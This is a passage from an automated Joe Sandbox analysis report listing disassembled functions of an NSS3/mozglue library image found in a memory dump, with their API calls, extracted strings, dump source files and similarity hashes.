TlsGetValue.KERNEL32(?,?,?,6C742E62,?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C), ref: 6C728EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C742E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C728EF1
PR_Unlock.NSS3 ref: 6C728F20

Strings

b.tl, xrefs: 6C728E96, 6C728F25

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.tl
API String ID: 1978757487-2381257471
Opcode ID: e10c1aa985fed7589093843daacff670fa153d3742db39da4e61cadeda0b99a4
Instruction ID: 1ecf21e19ebc9b072b9497eb3b345c7978919f8565be6c4768abe643d7b2bd42
Opcode Fuzzy Hash: e10c1aa985fed7589093843daacff670fa153d3742db39da4e61cadeda0b99a4
Instruction Fuzzy Hash: D121BC729087059FD700AF29C6885A9BBF4FF48318F05466EED988BB41D735E854CBC2

Function 6C758970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C7061C4,?,6C705639,00000000), ref: 6C758991
TlsGetValue.KERNEL32(?,?,?,?,?,6C705639,00000000), ref: 6C7589AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C705639,00000000), ref: 6C7589C6
PR_WaitCondVar.NSS3 ref: 6C7589F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C705639,00000000), ref: 6C758A0C

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Strings

9Vpl, xrefs: 6C758986

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9Vpl
API String ID: 2759447159-2943184560
Opcode ID: 004361f31404f3304b0030a41920e435b90a6fc6dbb923079c022e4213781a84
Instruction ID: 037a5b443f9197a7adde8659a1dfb65e4d4a99a066945c526924bb0c8f9715e1
Opcode Fuzzy Hash: 004361f31404f3304b0030a41920e435b90a6fc6dbb923079c022e4213781a84
Instruction Fuzzy Hash: 85218BB4954606CFCB00AF78C5841A9BBF4FF06318F51467ADC9897602EB30D8A5CBD2

Function 6C812C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C812CA0
PR_ExitMonitor.NSS3 ref: 6C812CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C812CD1
strdup.MOZGLUE(?), ref: 6C812CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C812D27

Strings

Loaded library %s (static lib), xrefs: 6C812D22

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: ee59952558b0f187da41d463560fb225d6945789a35810c1d3d52c9d829cd3ed
Instruction ID: fb6e3f134df14bd569fa92073de0d8c860338b3f7c0b6eb6b31473eca2c1b127
Opcode Fuzzy Hash: ee59952558b0f187da41d463560fb225d6945789a35810c1d3d52c9d829cd3ed
Instruction Fuzzy Hash: 3F1122B47042058FEB318F1AD908A6677F5AB4634DF04883DD80987F42D739E818CBE2

Function 6C7068E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7068FB
EnterCriticalSection.KERNEL32 ref: 6C706913
PORT_FreeArena_Util.NSS3 ref: 6C70693E
PR_Unlock.NSS3 ref: 6C706946
DeleteCriticalSection.KERNEL32 ref: 6C706951
free.MOZGLUE ref: 6C70695D
PR_Unlock.NSS3 ref: 6C706968

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: a10cca1b7686501d654447d64ce154deeb959e96aa3ae8f5f3c7a69f9ae9787c
Instruction ID: 3bb6b7569c4d442cfd701bd065340b716972b57730bc13959d575ff6371ea699
Opcode Fuzzy Hash: a10cca1b7686501d654447d64ce154deeb959e96aa3ae8f5f3c7a69f9ae9787c
Instruction Fuzzy Hash: 19116AF0A04A058FDB00AF68C18856DBBF4BF06348F01457CEC98CBA01EB30D488CB92

Function 6C760FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
TlsGetValue.KERNEL32(00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761044
free.MOZGLUE(00000000,?,00000800,6C6FEF74,00000000), ref: 6C761064

Strings

security, xrefs: 6C761025

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 2e1a849bed2ea6243aeeb9a2bbfee6f4871ab9691bdc1e7048db6fdd3a485c9e
Instruction ID: bf2e20b42365ce0dc371de469108f29cca9de25200a89520553d809e641cca82
Opcode Fuzzy Hash: 2e1a849bed2ea6243aeeb9a2bbfee6f4871ab9691bdc1e7048db6fdd3a485c9e
Instruction Fuzzy Hash: 96014475A002519BEB712F2F9E0DA563AA8BF0678DF010535EC8897E52EB70C104DBD2

Function 6C791C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C791C74

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C791C92
free.MOZGLUE(?), ref: 6C791C99
DeleteCriticalSection.KERNEL32(?), ref: 6C791CCB
free.MOZGLUE(?), ref: 6C791CD2

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 96b530eaa43105231d78c27d73febd6ab6e97dae1fabc287c71f0e8c0a8a2323
Instruction ID: 5bd3bbd806b4e2d8c95dd5555e1ed02ce7a0a55848be6883c9d3f9d7b69e8af6
Opcode Fuzzy Hash: 96b530eaa43105231d78c27d73febd6ab6e97dae1fabc287c71f0e8c0a8a2323
Instruction Fuzzy Hash: 5301D6B1F012206FDF30AFA5AE0DB553778670B31DF440174E509A6B41D3699014CBD1

Function 6C7A49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C795F34,00000A20), ref: 6C7A49EC

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C795F34,00000A20,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7A49F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C795F34,00000A20,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7A4A06
free.MOZGLUE(?,?,?,?,?,6C795F34,00000A20), ref: 6C7A4A16
free.MOZGLUE(?,?,?,?,?,6C795F34,00000A20), ref: 6C7A4A1C

Strings

4_yl , xrefs: 6C7A49C6, 6C7A4A21

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_yl
API String ID: 2193358613-3066146028
Opcode ID: 44262fdbe9ecbea01f6f8f57d29fbe42ac306841ef14c2aedb26c71d3df6b265
Instruction ID: 79851b792b6de07bed21043b8e8edfd1ceb60d80f7f411fbdf0a75de085ff8d7
Opcode Fuzzy Hash: 44262fdbe9ecbea01f6f8f57d29fbe42ac306841ef14c2aedb26c71d3df6b265
Instruction Fuzzy Hash: 92015EB69001049FCB00CF69DDC8C967BBCEF8A2493448175E909DB702EB31E915CBA1

Function 6C81C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6C791AB6,00000000,?,?,6C7907B9,?), ref: 6C81C9C6
free.MOZGLUE(?,?,6C7907B9,?), ref: 6C81C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C81C9E5
free.MOZGLUE(?), ref: 6C81C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6C81C9F8
free.MOZGLUE(?), ref: 6C81C9FF
free.MOZGLUE(00000000), ref: 6C81CA0B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: e9d11d9bdb6a98b9ed6b47a0e5a7409f0872f6475880a1e6e079d82f0b214c3d
Instruction ID: dba46e09a20695e4af6c3c0016c804f3df2408b2df11e1f9d7ecc6b4e4540218
Opcode Fuzzy Hash: e9d11d9bdb6a98b9ed6b47a0e5a7409f0872f6475880a1e6e079d82f0b214c3d
Instruction Fuzzy Hash: D8017CB2A00605ABDB61EFA5C848857B7F8FA4D2647040535E906C3601D739F455CBE2

Function 6C78AFB0 Relevance: 9.4, APIs: 6, Instructions: 355memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000140), ref: 6C78AFF4
memcpy.VCRUNTIME140(?,?,?), ref: 6C78B02F

Part of subcall function 6C78EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EE85

Part of subcall function 6C78EE50: realloc.MOZGLUE(BAEEE052,?), ref: 6C78EEAE
Part of subcall function 6C78EE50: PORT_Alloc_Util.NSS3(?), ref: 6C78EEC5
Part of subcall function 6C78EE50: htonl.WSOCK32(?), ref: 6C78EEE3
Part of subcall function 6C78EE50: htonl.WSOCK32(00000000,?), ref: 6C78EEED
Part of subcall function 6C78EE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C78EF01

Part of subcall function 6C78EF30: PR_SetError.NSS3(FFFFE013,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EF6D

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C78B2F7

Part of subcall function 6C78EF30: htonl.WSOCK32(00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EFE4
Part of subcall function 6C78EF30: htonl.WSOCK32(?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EFF1
Part of subcall function 6C78EF30: memcpy.VCRUNTIME140(?,?,6C7AA4A1,?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78F00B
Part of subcall function 6C78EF30: memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78F027

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,?,000003E8,00000000), ref: 6C78B339

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

SECITEM_AllocItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,000003E8,00000000), ref: 6C78B357
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78B3A4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorUtil$Item_$AllocAlloc_Unothrow_t@std@@@ValueZfree__ehfuncinfo$??2@memsetrealloc
String ID:
API String ID: 1535029029-0
Opcode ID: 5271d146c19da26452504566298e3199997b5b1a3b89d94635574d462d0a63e6
Instruction ID: cd9557e1573f4cc3594269c8c015225caf28415cedd1c53871176bdeef5bcea8
Opcode Fuzzy Hash: 5271d146c19da26452504566298e3199997b5b1a3b89d94635574d462d0a63e6
Instruction Fuzzy Hash: 8CB1A5B5A463006BF3109A35CE89FAB72ADEF4474CF040938FF55D6A82F771E51486A2

Function 6C7A2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7A3046

Part of subcall function 6C78EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C777FFB), ref: 6C7A312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7A3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7A2E8B

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

Part of subcall function 6C78F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C779BFF,?,00000000,00000000), ref: 6C78F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C777FFA), ref: 6C7A2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7A317B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: f0a153afd7a44101691b5340850a7eece89e2edd6321e53b9750218fe1b836de
Instruction ID: 612ad1c0ab10f49a3171ad912c353824358415e5f528849cbf011c3a5228a950
Opcode Fuzzy Hash: f0a153afd7a44101691b5340850a7eece89e2edd6321e53b9750218fe1b836de
Instruction Fuzzy Hash: 61A1CE75A002189FDB24CF54CD84BEAB7B5EF49308F0481A9ED4967781E731AD86CFA1

Function 6C75A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671a4717daf8cade72cde9afba4344cc4606a8721edd64a2c255936ff7c709b8
Instruction ID: b6c70f50afac4bf9123ef5750c149ef650889b718e06555fab706e60945eec99
Opcode Fuzzy Hash: 671a4717daf8cade72cde9afba4344cc4606a8721edd64a2c255936ff7c709b8
Instruction Fuzzy Hash: B1914C70E0426C4BCB25CE188A917FA77B5AF4A32CF9481F9C59947A01DE318DA5CBF1

Function 6C76ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C76ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C76EDCE

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

free.MOZGLUE(00000000,?,?,?,?,6C76B04F), ref: 6C76EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C76EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C76EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C76EEFB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: c2aae838d2e57ad6806fa7f11367389831c69114d41d99d9b53cc2274feb4f7b
Instruction ID: 2a09fee7a8641a387eede0ea3be741cac782104a2f5b89c0f544c63b77a4f710
Opcode Fuzzy Hash: c2aae838d2e57ad6806fa7f11367389831c69114d41d99d9b53cc2274feb4f7b
Instruction Fuzzy Hash: F4814CB5A002099FEB14CF56DE89BAB77F9AF88708F144438EC159BB51D731E814CBA1

Function 6C76CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C76C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C76DAE2,?), ref: 6C76C6C2

PR_Now.NSS3 ref: 6C76CD35

Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED

Part of subcall function 6C756C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C3F

PR_GetCurrentThread.NSS3 ref: 6C76CD54

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

Part of subcall function 6C757260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701CCC,00000000,00000000,?,?), ref: 6C75729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C76CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C76CE2C

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C76CE40

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

Part of subcall function 6C76CEE0: PORT_ArenaMark_Util.NSS3(?,6C76CD93,?), ref: 6C76CEEE
Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C76CD93,?), ref: 6C76CEFC
Part of subcall function 6C76CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C76CD93,?), ref: 6C76CF0B
Part of subcall function 6C76CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C76CD93,?), ref: 6C76CF1D

Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF47
